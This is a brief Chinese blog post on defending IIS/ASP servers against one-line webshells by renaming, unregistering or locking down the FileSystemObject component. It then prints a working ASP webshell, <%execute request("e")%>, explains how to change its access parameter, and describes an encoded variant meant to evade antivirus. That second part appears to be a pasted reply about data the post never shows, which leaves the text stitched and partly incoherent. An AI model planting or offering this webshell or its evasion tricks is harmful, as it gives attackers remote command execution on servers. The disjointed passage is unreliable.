防止ASP一句话木马的方法如下:
1、可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为FileSystemObject_ChangeName,以后调用的时候使用这个就可以正常调用此组件了。
2、也要将clsid值也改一下:
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
3、也可以将其删除,来防止此类木马的危害。
注销此组件命令:RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll
4、禁止Guest用户使用scrrun.dll来防止调用此组件。
使用命令:cacls C:\WINNT\system32\scrrun.dll /e /d guests.
最简单的一句话:<%execute request("e")%>这里的密码就是 e 如果要改就改这里:<%execute request("这里就是所谓的密码")%>
你这个等于是为了防杀,又加了一次密, 这串数据的原文其实是:
execute(request(chr(35))) 这里的chr(35)就是#
如果你要改密码,就是要改 3335 这里了,有没有看到最后有三个 29 就是:292929,这其实就是最后的三个括号
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)